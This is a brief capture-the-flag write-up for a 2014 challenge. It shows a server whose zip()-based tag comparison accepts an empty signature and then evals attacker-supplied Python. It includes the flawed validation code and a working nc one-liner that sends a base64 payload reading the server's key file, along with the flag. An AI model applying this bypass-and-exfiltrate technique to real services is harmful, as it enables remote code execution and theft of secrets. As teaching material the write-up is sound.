This challenge must have either been a joke or unintenionally broken, I solved it in like 2 minutes and it was worth 250 points. Unfortunately I was in a plane over the north sea and not able to submit the flag in time :(

Basically the challenge consists of a server who takes a command in the format : where command is a base64-encoded python code which is executed if the tag (which is basically a signature) is set correct. The tag is computed using a secret stored in a file called “secret”.

We got 4 test-commands (lc, echo, ls and stat) with a valid signature to analyze and maybe find a way for a hash-length-extension or whatever attack. We don’t need this because the signature-checking was broken.

This code validates the signature:

match = True
for i, j in zip(tag, t):
    if i != j:
        match = False

del key
del cipher

if match:
    print 'Made it' + eval(compile(command, "script", "exec"))
else:
    self.request.send("Checks failed!\n")

tag is the given tag, t is the calculated tag.

Python’s zip()-function takes two iterables and connects them, but only if both iterables have items. If we provide an empty tag we simply never hit the if and match has no chance to be set to False.

The exploit is:

echo :`echo "self.request.send(open('key').read())" | base64` | nc radioactive.2014.ghostintheshellcode.com 4324

Flag: Welcom3ToTheNewAgeItsARevolutionISuppose

by ccmndhd